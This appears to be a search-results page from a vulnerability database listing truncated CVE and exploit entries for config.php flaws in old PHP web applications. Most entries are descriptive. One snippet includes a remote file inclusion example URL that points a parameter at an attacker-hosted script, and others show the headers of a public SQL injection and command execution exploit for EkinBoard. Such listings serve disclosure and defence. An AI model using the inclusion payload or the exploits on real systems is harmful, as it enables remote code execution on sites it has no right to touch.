647 matches found
CVE-2006-0542
CVE-2006-0542 describes multiple SQL injection vulnerabilities in the NukedWeb GuestBookHost 2005.04.25, specifically in config.php where the email and password parameters are not properly sanitized. This allows remote attackers to execute arbitrary SQL commands via those parameters, potentially ...
CVE-2005-4686
PunBB 1.2.9 (often with F-ART BLOG:CMS) includes config.php before calling unregister_globals, enabling exposure of unspecified sensitive information. Root cause: premature/configuration sequencing in the initialization flow. Impact is limited to information disclosure; no explicit vector or expl...
Sql injection
Multiple SQL injection vulnerabilities in config.php in Insane Visions BlogPHP, possibly 1.0, allow remote attackers to execute arbitrary SQL commands via the (1) blogphpusername or (2) blogphppassword parameter in a cookie...
CVE-2006-0372
Multiple SQL injection vulnerabilities in config.php in Insane Visions BlogPHP, possibly 1.0, allow remote attackers to execute arbitrary SQL commands via the (1) blogphpusername or (2) blogphppassword parameter in a cookie...
BlogPHP config.php SQL injection login bypass
--------------------Summary---------------- Software: BlogPHP Software's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...
CVE-2005-4686
PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregister_globals function, which allows attackers to obtain unspecified sensitive information...
CVE-2005-4214
CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...
EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution
this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on register_globals = on Sun-Tzu: "The rising of birds in their flight is th...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
Exploit for unknown platform in category web applications. EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit. this works with magicquotesg...
EkinBoard 1.0.3 - config.php SQL Injection Command Execution
EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
No description provided by source. <?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-2149
CVE-2005-2149 affects Cacti
DEBIAN-CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-1696
Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites aka NS-Multisites...